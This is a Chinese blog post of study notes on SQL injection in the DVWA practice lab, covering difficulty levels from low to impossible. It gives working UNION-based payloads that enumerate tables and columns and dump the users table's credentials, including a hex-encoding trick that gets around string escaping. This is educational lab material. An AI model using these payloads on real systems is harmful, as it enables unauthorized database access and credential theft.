dvwa靶场sql injection学习笔记(low到impossible)

一、普通sql注入步骤(dvwa的low)

(1)判断类型:

数字类型:url中输入?id=1 and 1=1 页面依旧正常运行,继续下一步

url中输入?id=1 and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

字符类型:url中输入1' and '1' = '1,页面运行正常,继续进行下一步。

url中继续输入1' and '1' = '2,页面运行错误,则说明此 Sql 注入为字符型注入。

(2)猜解SQL查询语句中的字段数:

id =1' order by 3# 如果报错说明字段只有两列

用union select1,2查询回显位置,并且可以判断执行的SQL语句为select First name,Surname from 表 where ID=’id’…

(3)获取当前数据库及版本信息

1’ union select version(), database()#

4、获取数据库表名

1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() #

group_concat可以不用

5、获取表中的字段名

在上一步获取了表名后可以进行下面操作查询表中字段

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

dvwa中依然有报错,16进制hex输出即可即group_concat(hex(column_name))

6、获取字段中数据

1' union select user,password from users#

二、medium难度

采用burp suite抓包进行注入

步骤跟第一步相同,但是获取表格字段时采用id=3 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#会报错

$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); //mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。因此当SQL语句中'',会直接让其转义,并不能对数据库的内容进行修改。所以需要对users进行编码;user转换为16进制为0x7573657273。

输入id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&Submit=Submit可以解决

三、high难度

注入界面跟回显界面不同,防止了sqlmap注入,源码分析发现对注入进行了limit1限制,但是正常注入#就已经将其注释掉了,所以跟low注入即可,但是我使用group_concat注入只能回显一行,去掉group_concat正常,操作跟之前low一模一样。

四、impossible难度

采用了Anti-CSRF token防止CSRF攻击,is_numeric检查输入值是否是数字,并且用intval转换为整数形

使用了占位符:id防范sql注入,用bindparam()将id绑定到:id上

找了很多文章学习没有找到解决这个难度的过程,我也无从下手,然后看见一篇文章用sqlmap的cookie注入可以直接拿下

问题分析:

(1)获取表名时报错Illegal mix of collations for operation ‘UNION

出现这个问题是因为information_schema数据库里面都是utf8_general_ci,而靶场网站user表中的数据都是utf8_unicode_ci

解决方法:以16进制读取,然后再进行在线hex解码即可:如下

(2)查询字段时网页回显没反应即错误

获取表格字段时采用id=3 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#会报错。因为源代码中的$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); //mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。因此当SQL语句中'',会直接让其转义,并不能对数据库的内容进行修改。所以需要对users进行编码;user转换为16进制为0x7573657273。

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&Submit=Submit

参考文章:

(1)[网络安全] DVWA之SQL注入—Impossible level代码审计_dvwasql注入impossible-CSDN博客

(2)DVWA---SQL注入之Sqlmap_dvwa sqlmap-CSDN博客

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个故意设计有漏洞的Web应用程序,它被广泛用作安全测试和学习的实践平台。在DVWA靶场中,SQL注入是其中一个常见的漏洞。 SQL注入是一种利用现有应用程序的漏洞,将恶意的SQL命令插入到Web表单提交或输入的查询字符串中,从而欺骗服务器执行恶意的SQL命令。攻击者可以利用SQL注入来绕过应用程序的验证和访问控制,从而执行未经授权的操作。 在DVWA靶场中,你可以通过注入恶意的SQL语句来获取存在安全漏洞的网站上的数据库信息。例如,通过猜解SQL查询语句中的字段数,你可以尝试构造不同的注入语句来获取敏感数据。另外,你也可以使用联合查询来查找数据库中的表。 举个例子,当你在DVWA靶场中尝试查找数据库中的表时,你可以使用以下注入语句: id=2 union select 1,table_name from information_schema.tables where table_schema=(select database())#&Submit=Submit 这个注入语句通过联合查询的方式,从information_schema.tables表中获取当前数据库中的所有表名,并将结果返回给你。 需要注意的是,在实际环境中,SQL注入是一种非常危险的漏洞。为了防止SQL注入攻击,开发人员应该采取安全编码实践,比如使用参数化查询或者ORM框架来避免动态拼接SQL语句。同时,对于使用DVWA靶场进行学习和测试的用户,务必遵守合法和道德的原则,不要在未经授权的情况下攻击他人的系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [DVWA靶场通关(SQL注入)](https://blog.csdn.net/m0_56010012/article/details/123353103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值